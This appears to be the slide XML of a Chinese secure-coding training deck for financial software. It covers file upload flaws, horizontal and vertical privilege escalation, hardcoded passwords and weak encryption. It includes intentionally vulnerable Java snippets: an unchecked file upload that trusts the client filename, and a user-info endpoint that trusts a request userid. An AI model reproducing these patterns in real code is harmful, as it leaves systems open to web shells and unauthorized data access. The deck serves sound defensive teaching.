                  <a:t>✔</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="组合 36"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8206472" y="3207782"/>
              <a:ext cx="427251" cy="492443"/>
              <a:chOff x="7785100" y="6191250"/>
              <a:chExt cx="427251" cy="492443"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="棱台 37"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7874000" y="6337300"/>
                <a:ext cx="130602" cy="14605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39" name="矩形 38"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7785100" y="6191250"/>
                <a:ext cx="427251" cy="492443"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>✔</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="矩形 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6411045" y="2708436"/>
            <a:ext cx="2509020" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>金融软件产品开发需要</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2503286" y="5841281"/>
            <a:ext cx="3671198" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>金融是国家命脉，安全是金融基石</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="右箭头 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6243884" y="4080886"/>
            <a:ext cx="555734" cy="253015"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 53764"/>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sz="1490" dirty="0">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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件上传漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323528" y="90872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【代码示例】</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>MultipartFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>为例，示例代码片段如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>:</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3027720211"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="683568" y="1897670"/>
          <a:ext cx="8136904" cy="4339642"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8136904"/>
              </a:tblGrid>
              <a:tr h="4339642">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>public String handleFileUpload(MultipartFile file){</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String fileName = file.getOriginalFilename();</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if (fileName==null) { //上传文件函数只是对传入file进行简单的判空</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return "file is error";  //没有加任何的正则后缀判断或白名单限制</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      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>  }</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String filePath = "/static/images/uploads/"+fileName;</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if (!file.isEmpty()) {</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try {</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byte[] bytes = file.getBytes();</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BufferedOutputStream stream =</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new BufferedOutputStream(new FileOutputStream(new File(filePath)));</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stream.write(bytes);</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stream.close();</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return "OK</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>";</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>                …...</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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28625" y="0"/>
            <a:ext cx="8158163" cy="928688"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件上传漏洞：解决方案</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76803" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1071563"/>
            <a:ext cx="8229600" cy="5327650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 解决方案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>首先编码者需要对上传页面代码严格把关，特别是在保存文件的时候，考察可能出现的异常字符，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>..\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，空字符等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>其次，对文件扩展名检查要采取“允许</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>jpg,gif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>…”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>这样的检查，而不要采取“不允许</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>asp…”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>这样的检查；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>最好对上传文件的目录设置不可执行，这可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>服务器配置加固实现。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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47652" y="2564904"/>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94802"/>
            <a:ext cx="6624637" cy="652486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逻辑缺陷： 后台认证绕过漏洞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口令管理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未释放资源</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弱加密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r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>权限控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不当</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="133191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【规范要求】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>获取当前登陆用户并校验该用户是否具有当前操作权限，并校验请求操作数据是否属于当前登陆用户，当前登陆用户标识不能从用户可控的请求参数中获取。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>【释义说明】</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>越权漏洞可以分为水平、垂直越权两种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>程序在处理用户请求时未对用户的权限进行校验，使得用户可访问、操作其他相同角色用户的数据，这种情况是水平越权；如果低权限用户可访问、操作高权限用户则的数据，这种情况为垂直越权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>。</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r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>权限控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不当</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="133191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【代码示例】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sz="1600" dirty="0">
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>水平、垂直越权不需关注特定函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="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50093" y="2208054"/>
          <a:ext cx="7643813" cy="2773680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7643813"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>@RequestMapping(value="/getUserInfo",method = RequestMethod.GET)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    public String getUserInfo(Model model, HttpServletRequest request) throws IOException {</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        String userid = request.getParameter("userid");</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        if(!userid.isEmpty()){ //</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>只是进行简单的userid判空，没有进行用户userid 对应的角色id的校验，应该判断下外键属性id的角色权限是否为当前所用</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>            String info=userModel.getuserInfoByid(userid);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>            return info;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        }</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        return "";</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" altLang="zh-CN" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>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47652" y="3068960"/>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13926" y="773907"/>
            <a:ext cx="6624637" cy="6063198"/>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口令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>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未释放资源</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弱加密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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>硬编码密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
